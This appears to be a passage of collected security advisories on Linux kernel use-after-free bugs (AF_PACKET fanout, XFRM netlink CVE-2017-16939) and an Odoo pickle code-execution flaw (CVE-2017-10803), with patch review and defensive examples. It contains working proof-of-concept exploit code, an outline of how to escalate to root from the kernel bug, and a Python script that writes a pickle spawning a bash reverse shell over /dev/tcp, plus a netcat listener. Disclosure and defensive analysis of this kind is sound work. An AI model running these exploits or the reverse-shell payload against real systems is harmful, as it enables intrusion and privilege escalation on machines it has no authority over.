short sll_protocol; // big endian
int sll_ifindex;
unsigned short sll_hatype;
unsigned char sll_pkttype;
unsigned char sll_halen;
    unsigned char sll_addr[8];
};

static int fd;
static struct ifreq ifr;
static struct sockaddr_ll addr;

void *task1(void *unused)
{
    int fanout_val = 0x3;
    // need race: check on po->running
    // also must be 1st or link wont register
    // 0x107 is SOL_PACKET, 18 is PACKET_FANOUT
    int err = setsockopt(fd, 0x107, 18, &fanout_val, sizeof(fanout_val));
    // IS_ERR(err == -1, "setsockopt");
    (void)err;
    return NULL;
}

void *task2(void *unused)
{
    int err = bind(fd, (struct sockaddr *)&addr, sizeof(addr));
    // IS_ERR(err == -1, "bind");
    (void)err;
    return NULL;
}

void loop_race(void)
{
    int err, index;

    while (1) {
        fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
        IS_ERR(fd == -1, "socket");

        strcpy((char *)&ifr.ifr_name, "lo");
        err = ioctl(fd, SIOCGIFINDEX, &ifr);
        IS_ERR(err == -1, "ioctl SIOCGIFINDEX");
        index = ifr.ifr_ifindex;

        // bring the interface down so the fanout/bind race has a window
        err = ioctl(fd, SIOCGIFFLAGS, &ifr);
        IS_ERR(err == -1, "ioctl SIOCGIFFLAGS");
        ifr.ifr_flags &= ~(short)IFF_UP;
        err = ioctl(fd, SIOCSIFFLAGS, &ifr);
        IS_ERR(err == -1, "ioctl SIOCSIFFLAGS");

        addr.sll_family = AF_PACKET;
        addr.sll_protocol = 0x0; // need something different to rehook && 0 to skip register_prot_hook
        addr.sll_ifindex = index;

        pthread_t thread1, thread2;
        pthread_create(&thread1, NULL, task1, NULL);
        pthread_create(&thread2, NULL, task2, NULL);
        pthread_join(thread1, NULL);
        pthread_join(thread2, NULL);

        // UAF
        close(fd);
    }
}

static bool write_file(const char *file, const char *what, ...)
{
    char buf[1024];
    va_list args;
    va_start(args, what);
    vsnprintf(buf, sizeof(buf), what, args);
    va_end(args);
    buf[sizeof(buf) - 1] = 0;
    int len = strlen(buf);

    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;
    if (write(fd, buf, len) != len) {
        close(fd);
        return false;
    }
    close(fd);
    return true;
}

// Unprivileged user + network namespace: gives CAP_NET_RAW/CAP_NET_ADMIN
// inside the new netns, which is what the AF_PACKET setup above needs.
void setup_sandbox(void)
{
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0) {
        printf("[!] unprivileged user namespaces are not available\n");
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }
    if (unshare(CLONE_NEWNET) != 0) {
        perror("[-] unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/setgroups", "deny")) {
        perror("[-] write_file(/proc/self/set_groups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }
}

int main(int argc, char *argv[])
{
    setup_sandbox();
    system("id; capsh --print");
    loop_race();
    return 0;
}
```
## Crash report
```
[ 73.703931] dev_remove_pack: ffff880067cee280 not found
[ 73.717350] ==================================================================
[ 73.726151] BUG: KASAN: use-after-free in dev_add_pack+0x1b1/0x1f0
[ 73.729371] Write of size 8 at addr ffff880067d28870 by task poc/1175
[ 73.732594]
[ 73.733605] CPU: 3 PID: 1175 Comm: poc Not tainted 4.14.0-rc1+ #29
[ 73.737714] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04/01/2014
[ 73.746433] Call Trace:
[ 73.747985] dump_stack+0x6c/0x9c
[ 73.749410] ? dev_add_pack+0x1b1/0x1f0
[ 73.751622] print_address_description+0x73/0x290
[ 73.753646] ? dev_add_pack+0x1b1/0x1f0
[ 73.757343] kasan_report+0x22b/0x340
[ 73.758839] __asan_report_store8_noabort+0x17/0x20
[ 73.760617] dev_add_pack+0x1b1/0x1f0
[ 73.761994] register_prot_hook.part.52+0x90/0xa0
[ 73.763675] packet_create+0x5e3/0x8c0
[ 73.765072] __sock_create+0x1d0/0x440
[ 73.766030] SyS_socket+0xef/0x1b0
[ 73.766891] ? move_addr_to_kernel+0x60/0x60
[ 73.769137] ? exit_to_usermode_loop+0x118/0x150
[ 73.771668] entry_SYSCALL_64_fastpath+0x13/0x94
[ 73.773754] RIP: 0033:0x44d8a7
[ 73.775130] RSP: 002b:00007ffc4e642818 EFLAGS: 00000217 ORIG_RAX: 0000000000000029
[ 73.780503] RAX: ffffffffffffffda RBX: 00000000004002f8 RCX: 000000000044d8a7
[ 73.785654] RDX: 0000000000000011 RSI: 0000000000000003 RDI: 0000000000000011
[ 73.790358] RBP: 00007ffc4e642840 R08: 00000000000000ca R09: 00007f4192e6e9d0
[ 73.793544] R10: 0000000000000000 R11: 0000000000000217 R12: 000000000040b410
[ 73.795999] R13: 000000000040b4a0 R14: 0000000000000000 R15: 0000000000000000
[ 73.798567]
[ 73.799095] Allocated by task 1360:
[ 73.800300] save_stack_trace+0x16/0x20
[ 73.802533] save_stack+0x46/0xd0
[ 73.803959] kasan_kmalloc+0xad/0xe0
[ 73.805833] kmem_cache_alloc_trace+0xd7/0x190
[ 73.808233] packet_setsockopt+0x1d29/0x25c0
[ 73.810226] SyS_setsockopt+0x158/0x240
[ 73.811957] entry_SYSCALL_64_fastpath+0x13/0x94
[ 73.814636]
[ 73.815367] Freed by task 1175:
[ 73.816935] save_stack_trace+0x16/0x20
[ 73.821621] save_stack+0x46/0xd0
[ 73.825576] kasan_slab_free+0x72/0xc0
[ 73.827477] kfree+0x91/0x190
[ 73.828523] packet_release+0x700/0xbd0
[ 73.830162] sock_release+0x8d/0x1d0
[ 73.831612] sock_close+0x16/0x20
[ 73.832906] __fput+0x276/0x6d0
[ 73.834730] ____fput+0x15/0x20
[ 73.835998] task_work_run+0x121/0x190
[ 73.837564] exit_to_usermode_loop+0x131/0x150
[ 73.838709] syscall_return_slowpath+0x15c/0x1a0
[ 73.840403] entry_SYSCALL_64_fastpath+0x92/0x94
[ 73.842343]
[ 73.842765] The buggy address belongs to the object at ffff880067d28000
[ 73.842765] which belongs to the cache kmalloc-4096 of size 4096
[ 73.845897] The buggy address is located 2160 bytes inside of
[ 73.845897] 4096-byte region [ffff880067d28000, ffff880067d29000)
[ 73.851443] The buggy address belongs to the page:
[ 73.852989] page:ffffea00019f4a00 count:1 mapcount:0 mapping: (null) index:0x0 compound_mapcount: 0
[ 73.861329] flags: 0x100000000008100(slab|head)
[ 73.862992] raw: 0100000000008100 0000000000000000 0000000000000000 0000000180070007
[ 73.866052] raw: dead000000000100 dead000000000200 ffff88006cc02f00 0000000000000000
[ 73.870617] page dumped because: kasan: bad access detected
[ 73.872456]
[ 73.872851] Memory state around the buggy address:
[ 73.874057] ffff880067d28700: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.876931] ffff880067d28780: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.878913] >ffff880067d28800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.880658] ^
[ 73.884772] ffff880067d28880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.890978] ffff880067d28900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.897763] ==================================================================
```
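Reports like the one above are the first artifact a triager sees, and the fields that matter (bug kind, the faulting function, the access, the slab cache, and the first non-KASAN frame of the allocation and free stacks) are buried in timestamped lines. The following parser is an added example, not part of the original write-up; SAMPLE_REPORT is an abridged excerpt of the report above, and the noise-frame prefixes are the example's own choice.

```python
"""Parse a KASAN report (as captured from dmesg or the console) into the fields
a triager wants first. Added example; not part of the original write-up.
SAMPLE_REPORT is an abridged excerpt of the crash report quoted above."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE_REPORT = """\
[   73.726151] BUG: KASAN: use-after-free in dev_add_pack+0x1b1/0x1f0
[   73.729371] Write of size 8 at addr ffff880067d28870 by task poc/1175
[   73.733605] CPU: 3 PID: 1175 Comm: poc Not tainted 4.14.0-rc1+ #29
[   73.746433] Call Trace:
[   73.747985]  dump_stack+0x6c/0x9c
[   73.749410]  ? dev_add_pack+0x1b1/0x1f0
[   73.760617]  dev_add_pack+0x1b1/0x1f0
[   73.761994]  register_prot_hook.part.52+0x90/0xa0
[   73.765072]  packet_create+0x5e3/0x8c0
[   73.799095] Allocated by task 1360:
[   73.800300]  save_stack_trace+0x16/0x20
[   73.803959]  kasan_kmalloc+0xad/0xe0
[   73.808233]  packet_setsockopt+0x1d29/0x25c0
[   73.810226]  SyS_setsockopt+0x158/0x240
[   73.815367] Freed by task 1175:
[   73.816935]  save_stack_trace+0x16/0x20
[   73.827477]  kfree+0x91/0x190
[   73.828523]  packet_release+0x700/0xbd0
[   73.830162]  sock_release+0x8d/0x1d0
[   73.842765] The buggy address belongs to the object at ffff880067d28000
[   73.842765]  which belongs to the cache kmalloc-4096 of size 4096
[   73.845897] The buggy address is located 2160 bytes inside of
"""

TIMESTAMP = re.compile(r"^\[\s*[\d.]+\]\s?")
HEADER = re.compile(r"BUG: KASAN: (\S+) in (\S+)")
ACCESS = re.compile(r"(Read|Write) of size (\d+) at addr ([0-9a-f]+) by task (\S+)")
FRAME = re.compile(r"^\s*(\?\s+)?([\w.]+\+0x[0-9a-f]+/0x[0-9a-f]+)\s*$")
CACHE = re.compile(r"belongs to the cache (\S+) of size (\d+)")
OFFSET = re.compile(r"located (\d+) bytes inside of")

# Frames that belong to KASAN/stack-saving/allocator machinery, not to the bug.
NOISE_PREFIXES = ("save_stack", "kasan_", "dump_stack", "print_address_description",
                  "__asan_", "kmem_cache_alloc", "kmalloc", "kfree")

@dataclass
class KasanReport:
    bug_kind: str = ""
    in_func: str = ""
    access: str = ""
    size: int = 0
    addr: str = ""
    task: str = ""
    cache: str = ""
    offset: Optional[int] = None
    call_trace: List[str] = field(default_factory=list)
    alloc_trace: List[str] = field(default_factory=list)
    free_trace: List[str] = field(default_factory=list)

def parse_kasan(text: str) -> KasanReport:
    r = KasanReport()
    section = None  # the stack that following frame lines belong to
    for raw in text.splitlines():
        line = TIMESTAMP.sub("", raw)
        if m := HEADER.search(line):
            r.bug_kind, r.in_func = m.group(1), m.group(2)
        elif m := ACCESS.search(line):
            r.access, r.size, r.addr, r.task = m.group(1), int(m.group(2)), m.group(3), m.group(4)
        elif line.startswith("Call Trace:"):
            section = r.call_trace
        elif line.startswith("Allocated by task"):
            section = r.alloc_trace
        elif line.startswith("Freed by task"):
            section = r.free_trace
        elif m := CACHE.search(line):
            r.cache = m.group(1)
        elif m := OFFSET.search(line):
            r.offset = int(m.group(1))
        elif (m := FRAME.match(line)) and section is not None:
            if not m.group(1):  # a leading "? " marks an unreliable frame; skip it
                section.append(m.group(2))
        elif line.startswith("The buggy address"):
            section = None
    return r

def first_real_frame(frames: List[str]) -> Optional[str]:
    """The first frame that is not KASAN/allocator plumbing: the code to look at."""
    for f in frames:
        if not f.startswith(NOISE_PREFIXES):
            return f
    return None

def summary(r: KasanReport) -> str:
    return (f"{r.bug_kind} {r.access.lower()} of {r.size} bytes in {r.in_func} by {r.task}; "
            f"object from {r.cache}, offset {r.offset}; "
            f"allocated in {first_real_frame(r.alloc_trace)}, freed in {first_real_frame(r.free_trace)}")

if __name__ == "__main__":
    print(summary(parse_kasan(SAMPLE_REPORT)))
```

Run over the sample it yields the one-line triage summary: a use-after-free write of 8 bytes in dev_add_pack, on a kmalloc-4096 object allocated in packet_setsockopt and freed in packet_release, which is exactly the allocation/free pair the analysis below reasons about.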
We know that the freed object is a kmalloc-4096 object:
```
struct packet_fanout {
possible_net_t net;
unsigned int num_members;
u16 id;
u8 type;
u8 flags;
union {
atomic_t rr_cur;
struct bpf_prog __rcu *bpf_prog;
};
struct list_head list;
struct sock *arr[PACKET_FANOUT_MAX];
spinlock_t lock;
refcount_t sk_ref;
struct packet_type prot_hook ____cacheline_aligned_in_smp;
};
```
and that its prot_hook member is the one being referenced in the packet handler when registered via dev_add_pack() from register_prot_hook() inside af_packet.c:
```
struct packet_type {
__be16 type; /* This is really htons(ether_type). */
struct net_device *dev; /* NULL is wildcarded here */
int (*func) (struct sk_buff *,
struct net_device *,
struct packet_type *,
struct net_device *);
bool (*id_match)(struct packet_type *ptype,
struct sock *sk);
void *af_packet_priv;
struct list_head list;
};
```
The function pointers inside struct packet_type, together with the fact that the object lives in a large slab (kmalloc-4096), make heap spraying easier and more reliable, since larger slabs are used less often by the kernel.
The usual kernel heap-spraying techniques, for example via sendmmsg(), can be used to replace the contents of the freed packet_fanout object.
Even if the allocation is not permanent, it still overwrites the targeted content of packet_fanout (i.e. the function pointers), and because kmalloc-4096 is very stable it is much less likely that another allocation will corrupt the payload.
id_match() is called when an skb is sent via dev_queue_xmit(), which can be reached with a sendmsg() on an AF_PACKET socket: the kernel loops through the list of packet handlers and calls id_match() if it is not NULL. This gives control of the program counter.
Once the location of the kernel's code section is known, the kernel stack can be pivoted into the fake packet_fanout object for ROP. The first argument, ptype, contains the address of the prot_hook member of the fake object, which tells us where to pivot.
Once in the ROP chain, native_write_cr4() can be used to disable SMEP/SMAP, after which execution can return to a user-mapped executable payload that calls commit_creds(prepare_kernel_cred(0)) to elevate the process to root.

## Vulnerability Summary
The following advisory describes a use-after-free vulnerability in the Linux kernel that can lead to privilege escalation. The vulnerability was found in the XFRM Netlink socket subsystem.
Netlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules.
## Credit
An independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
##Vendor response
The vulnerability has been addressed by patch 1137b5e (“ipsec: Fix aborted xfrm policy dump crash”), tracked as CVE-2017-16939:
```
@@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr
static int xfrm_dump_policy_done(struct netlink_callback *cb)
{
- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];
+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;
struct net *net = sock_net(cb->skb->sk);
xfrm_policy_walk_done(walk, net);
return 0;
}
+static int xfrm_dump_policy_start(struct netlink_callback *cb)
+{
+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;
+
+ BUILD_BUG_ON(sizeof(*walk) > sizeof(cb->args));
+
+ xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);
+ return 0;
+}
+
static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb)
{
struct net *net = sock_net(skb->sk);
- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];
+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;
struct xfrm_dump_info info;
- BUILD_BUG_ON(sizeof(struct xfrm_policy_walk) >
- sizeof(cb->args) - sizeof(cb->args[0]));
-
info.in_skb = cb->skb;
info.out_skb = skb;
info.nlmsg_seq = cb->nlh->nlmsg_seq;
info.nlmsg_flags = NLM_F_MULTI;
- if (!cb->args[0]) {
- cb->args[0] = 1;
- xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);
- }
-
(void) xfrm_policy_walk(net, walk, dump_one_policy, &info);
return skb->len;
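```
Review bot: the substantive fix in this hunk is the removal of the lazy `cb->args[0]` flag: before, `xfrm_dump_policy_done` called `xfrm_policy_walk_done(walk, net)` on a walk that `xfrm_dump_policy` had never passed through `xfrm_policy_walk_init` if the dump never got that far, and the new `xfrm_dump_policy_start` guarantees initialization before any `dump` or `done` runs. Worth double-checking in the same hunk: the `BUILD_BUG_ON` bound loosens from `sizeof(cb->args) - sizeof(cb->args[0])` to `sizeof(cb->args)`, which is only valid because `args[0]` is no longer reserved as the flag and the walk now starts at `cb->args` instead of `&cb->args[1]`; a one-line comment on the cast, in all three places it appears, would save the next reader from re-deriving that.
```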
@@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = {
static const struct xfrm_link {
int (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **);
+ int (*start)(struct netlink_callback *);
int (*dump)(struct sk_buff *, struct netlink_callback *);
int (*done)(struct netlink_callback *);
const struct nla_policy *nla_pol;
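```
Review bot: the new `start` member is optional, so every consumer of `struct xfrm_link` must treat a NULL `start` as "no start callback"; the table below sets it only for `XFRM_MSG_GETPOLICY`. A short comment on the field stating that it is called once before the first `dump` would document that contract next to the declaration, where the `doit`/`dump`/`done` trio currently has none either.
```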
@@ -2487,6 +2490,7 @@ static const struct xfrm_link {
[XFRM_MSG_NEWPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_add_policy },
[XFRM_MSG_DELPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy },
[XFRM_MSG_GETPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy,
+ .start = xfrm_dump_policy_start,
.dump = xfrm_dump_policy,
.done = xfrm_dump_policy_done },
[XFRM_MSG_ALLOCSPI - XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi },
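```
Review bot: only the `XFRM_MSG_GETPOLICY` entry gains `.start = xfrm_dump_policy_start`, which is the one dump that initialized its walk lazily; any other entry in this table whose `.dump` sets up per-dump state on first call (not visible in this hunk) has the same done-before-dump hazard and should get a `.start` the same way. Visible but pre-existing and not part of this change: `XFRM_MSG_DELPOLICY` and `XFRM_MSG_GETPOLICY` share `.doit = xfrm_get_policy`.
```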
@@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,
{
struct netlink_dump_control c = {
+ .start = link->start,
.dump = link->dump,
.done = link->done,
};
```
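Review bot: `link->start` is copied into `netlink_dump_control` unconditionally, so this relies on `netlink_dump_start` accepting a NULL `.start` for every link that does not set one; that check is outside the hunk, so confirm it exists rather than adding a conditional here. Initializing start, dump and done together in one place is what keeps `cb_running` consistent with an initialized walk on the failure path described in the details section below.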
## Vulnerability details
An unprivileged user can change the value of sk->sk_rcvbuf (sk being the struct sock object) of an XFRM Netlink socket.
The value can be changed within a specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of the buffer that receives data via recvmsg/recv/read.
The sk_rcvbuf value is how many bytes the kernel should allocate for the skbs (struct sk_buff objects).
skb->truesize keeps track of how many bytes of memory are consumed; to avoid waste and to manage memory, the kernel can adjust the skb size at run time.
For example, if a large socket buffer (skb) is allocated and only a 1-byte packet is received, the kernel adjusts this by calling skb_set_owner_r.
Calling skb_set_owner_r modifies sk->sk_rmem_alloc (which refers to the atomic variable sk->sk_backlog.rmem_alloc).
When an XFRM netlink socket is created, xfrm_dump_policy is called; when the socket is closed, xfrm_dump_policy_done is called.
xfrm_dump_policy_done is called whenever cb_running of the netlink_sock object is true.
xfrm_dump_policy_done tries to clean up an xfrm walk entry, which is managed by the netlink_callback object.
When netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates sk_rmem_alloc.
netlink_dump():
In netlink_dump(), the check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (note that sk->sk_rcvbuf is controllable via setsockopt).
When this condition fails, the function jumps to its end and returns with failure, and the value of cb_running is not changed to false.
nlk->cb_running is still true, thus xfrm_dump_policy_done() is called.
nlk->cb.done points to xfrm_dump_policy_done; it is worth noting that this function handles a doubly linked list, so if the vulnerability can be tweaked to reference a controlled buffer, a read/write-what-where primitive is possible.
## Proof of Concept
The following proof of concept is for Ubuntu 17.04.
```
#define _GNU_SOURCE
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <asm/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/netlink.h>
#include <linux/xfrm.h>
#include <sched.h>
#include <unistd.h>

#define BUFSIZE 2048

int fd;
struct sockaddr_nl addr;

struct msg_policy {
    struct nlmsghdr msg;
    char buf[BUFSIZE];
};

void create_nl_socket(void)
{
    fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (fd < 0) {
        perror("socket(NETLINK_XFRM)");
        exit(1);
    }
    memset(&addr, 0, sizeof(struct sockaddr_nl));
    addr.nl_family = AF_NETLINK;
    addr.nl_pid = 0;                 /* packet goes into the kernel */
    addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */
}

void do_setsockopt(void)
{
    int var = 0x100;
    /* level 1 in the original is SOL_SOCKET: shrink sk_rcvbuf so that the
     * sk_rmem_alloc check in netlink_dump() fails */
    setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &var, sizeof(int));
}

struct msg_policy *init_policy_dump(int size)
{
    struct msg_policy *r;
    (void)size; /* unused, kept from the original signature */
    r = malloc(sizeof(struct msg_policy));
    if (r == NULL) {
        perror("malloc");
        exit(-1);
    }
    memset(r, 0, sizeof(struct msg_policy));
    r->msg.nlmsg_len = 0x10;
    r->msg.nlmsg_type = XFRM_MSG_GETPOLICY;
    r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;
    r->msg.nlmsg_seq = 0x1;
    r->msg.nlmsg_pid = 2;
    return r;
}

int send_msg(int fd, struct nlmsghdr *msg)
{
    int err;
    err = sendto(fd, (void *)msg, msg->nlmsg_len, 0,
                 (struct sockaddr *)&addr, sizeof(struct sockaddr_nl));
    if (err < 0) {
        perror("sendto");
        return -1;
    }
    return 0;
}

/* new user + network namespace: gives the capabilities needed for XFRM netlink */
void create_ns(void)
{
    if (unshare(CLONE_NEWUSER) != 0) {
        perror("unshare(CLONE_NEWUSER)");
        exit(1);
    }
    if (unshare(CLONE_NEWNET) != 0) {
        perror("unshare(CLONE_NEWNET)");
        exit(2);
    }
}

int main(int argc, char **argv)
{
    struct msg_policy *p;
    create_ns();
    create_nl_socket();
    p = init_policy_dump(100);
    do_setsockopt();
    send_msg(fd, &p->msg);
    p = init_policy_dump(1000);
    send_msg(fd, &p->msg);
    return 0;
}
```
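Both proofs of concept on this page (setup_sandbox() in the AF_PACKET PoC above and create_ns() in the XFRM PoC just shown) begin with unshare(CLONE_NEWUSER) followed by unshare(CLONE_NEWNET), which is how an unprivileged process obtains the network capabilities needed to reach the vulnerable code. The following added example, which is not part of either advisory, reads the two sysctls that govern unprivileged user-namespace creation and reports whether that entry point is open on the host. The sysctl paths are real (user.max_user_namespaces upstream, kernel.unprivileged_userns_clone on Debian/Ubuntu kernels); the verdict logic is the example's own.

```python
"""Report whether an unprivileged process on this host can create a user
namespace, the first step of both proofs of concept on this page.
Added example, not from either advisory."""
from pathlib import Path
from typing import Dict, Optional

# Upstream (since 4.9): per-user limit on user namespaces; 0 disables creation.
MAX_USER_NAMESPACES = Path("/proc/sys/user/max_user_namespaces")
# Debian/Ubuntu kernels only: 0 forbids unprivileged user namespace creation.
UNPRIVILEGED_USERNS_CLONE = Path("/proc/sys/kernel/unprivileged_userns_clone")

def read_sysctl(path: Path) -> Optional[int]:
    """Integer value of a /proc/sys entry, or None when this kernel lacks it."""
    try:
        return int(path.read_text().strip())
    except (OSError, ValueError):
        return None

def assess_userns(max_user_ns: Optional[int], unpriv_clone: Optional[int]) -> Dict[str, object]:
    """Pure policy function so it can be tested without touching /proc.
    'exposed' is True when nothing stops an unprivileged unshare(CLONE_NEWUSER)."""
    blockers, notes = [], []
    if max_user_ns == 0:
        blockers.append("user.max_user_namespaces = 0 (user namespaces disabled for all users)")
    elif max_user_ns is None:
        notes.append("user.max_user_namespaces absent: kernel predates per-user namespace limits")
    if unpriv_clone == 0:
        blockers.append("kernel.unprivileged_userns_clone = 0 (unprivileged creation forbidden)")
    elif unpriv_clone is None:
        notes.append("kernel.unprivileged_userns_clone absent: not a Debian/Ubuntu kernel; "
                     "restrict via max_user_namespaces or an LSM policy instead")
    return {"exposed": not blockers, "blockers": blockers, "notes": notes}

def check_host() -> Dict[str, object]:
    return assess_userns(read_sysctl(MAX_USER_NAMESPACES),
                         read_sysctl(UNPRIVILEGED_USERNS_CLONE))

if __name__ == "__main__":
    verdict = check_host()
    print("unprivileged user namespaces:", "EXPOSED" if verdict["exposed"] else "blocked")
    for item in verdict["blockers"] + verdict["notes"]:
        print(" -", item)
```

A "blocked" verdict only closes this particular unprivileged entry point (a process that already holds CAP_NET_ADMIN, or a root user, is unaffected); it is a compensating control, not a substitute for the kernel patch referenced above.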

## Vulnerability Summary
The following advisory describes an arbitrary Python code execution vulnerability found in Odoo CRM version 10.0.
Odoo is a suite of open source business apps that cover all your company needs: CRM, eCommerce, accounting, inventory, point of sale, project management, etc. Odoo's unique value proposition is to be at the same time very easy to use and fully integrated.
## Credit
An independent security researcher has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
Odoo has done a private disclosure for the issue we reported, and the patch was merged in all supported branches.
CVE: CVE-2017-10803
The full public disclosure will be available at https://github.com/odoo/odoo/issues/17898.
## Vulnerability Details
One of the core Odoo modules, Database Anonymization, allows an administrator to anonymize the contents of the Odoo database. The module does this by serializing the contents of the existing database with Python's pickle module into a backup file before modifying the contents of the database. The administrator can then de-anonymize the database by loading the pickled backup file.
Python's pickle module can be made to execute arbitrary Python code when loading an attacker-controlled pickle file. As a result, an administrator can execute arbitrary Python code with the same privilege level as the Odoo web application by anonymizing the database and then attempting the de-anonymization process with a crafted pickle file.
## Proof of Concept
To reproduce the vulnerability, navigate to the Apps page (the link is in the navigation bar at the top), search for “Database Anonymization” in the search bar and install it. The “Apps” filter in the search bar has to be deselected for it to show up.
Once the module is installed, navigate to the settings page, select “Anonymize database” under “Database anonymization” and click the “Anonymize Database” button. Next, refresh the page and navigate to the same page under settings. Upload the “exploit.pickle” file generated by the script below and click the “Reverse the Database Anonymization” button. A reverse shell is obtained.
The following Python file generates a malicious pickle file that attempts (via bash) to connect back to a listener on port 8000:
```
import cPickle
import os
import base64
import pickletools


class Exploit(object):
    def __reduce__(self):
        return (os.system, (("bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"),))


with open("exploit.pickle", "wb") as f:
    cPickle.dump(Exploit(), f, cPickle.HIGHEST_PROTOCOL)
```
A netcat listener on port 8000 receives the connection:
```
ncat -nlvp 8000
```
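The mechanism above is the __reduce__ hook: a pickle is a small program, and loading it resolves globals and calls them. Two defensive measures follow from that, shown here as an added example in Python 3 (not Odoo's code and not part of the advisory): disassembling an uploaded backup with pickletools before loading it, which lists every opcode that can resolve or call something without executing anything, and loading through an Unpickler whose find_class() only resolves an explicit allowlist. The allowlist and the sample objects are constructed for the example; the "unsafe" sample records a call to builtins.len so that the scan and the rejection can be demonstrated harmlessly.

```python
"""Inspect a pickle before loading it, and load it through a restricted
unpickler. Added example (Python 3), not part of the advisory or of Odoo.
pickletools only disassembles, so scan_pickle() is safe on untrusted input;
ALLOWED_GLOBALS is a constructed allowlist for this example."""
import datetime
import importlib
import io
import pickle
import pickletools
from typing import List, Tuple

# Opcodes that resolve a global or call something while loading.
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}

# Globals a legitimate backup of plain data may need. Constructed for this
# example; a real deployment enumerates the types it actually serializes.
ALLOWED_GLOBALS = {
    "builtins": {"set", "frozenset", "range", "bytearray"},
    "datetime": {"date", "datetime", "timedelta"},
    "decimal": {"Decimal"},
}

def scan_pickle(data: bytes) -> List[Tuple[str, object, int]]:
    """(opcode, target, byte offset) for every opcode that can run code.
    STACK_GLOBAL takes module and name from the two preceding string pushes."""
    hits = []
    recent: List[str] = []
    for op, arg, pos in pickletools.genops(data):
        if isinstance(arg, str):
            recent = (recent + [arg])[-2:]
        if op.name == "STACK_GLOBAL":
            hits.append((op.name, ".".join(recent), pos))
        elif op.name == "GLOBAL":
            hits.append((op.name, arg.replace(" ", ".", 1), pos))
        elif op.name in CODE_OPCODES:
            hits.append((op.name, arg, pos))
    return hits

class RestrictedUnpickler(pickle.Unpickler):
    """Only allowlisted globals resolve; anything else (os.system included)
    fails inside find_class, before any call is made."""
    def find_class(self, module, name):
        if name in ALLOWED_GLOBALS.get(module, ()):
            return getattr(importlib.import_module(module), name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")

def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def is_rejected(data: bytes) -> bool:
    """True when the restricted loader refuses the pickle."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False

class _CallOnLoad:
    """Constructed test object: its pickle records a call to builtins.len,
    the same __reduce__ mechanism the advisory's payload uses with os.system."""
    def __reduce__(self):
        return (len, ("abc",))

def sample_pickles():
    """Constructed inputs: plain data, a code-calling object, an allowlisted type."""
    benign = pickle.dumps({"customer": "ACME", "ids": [1, 2, 3]}, protocol=4)
    calls_code = pickle.dumps(_CallOnLoad(), protocol=4)
    dated = pickle.dumps(datetime.date(2017, 8, 25), protocol=4)
    return benign, calls_code, dated

if __name__ == "__main__":
    for label, blob in zip(("benign", "calls_code", "dated"), sample_pickles()):
        print(label, "hits:", scan_pickle(blob), "rejected:", is_rejected(blob))
```

The scan is a signal rather than a verdict (legitimate objects such as dates also pickle through a global plus REDUCE, as the third sample shows); the allowlist is what decides, and the only safe policy for a file an administrator uploads is the narrow one.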

## Vulnerability Summary
The following advisory describes an unauthorized access vulnerability that allows an unauthenticated user to add their own SSH key to a remote Trustwave SWG version 11.8.0.27 device.
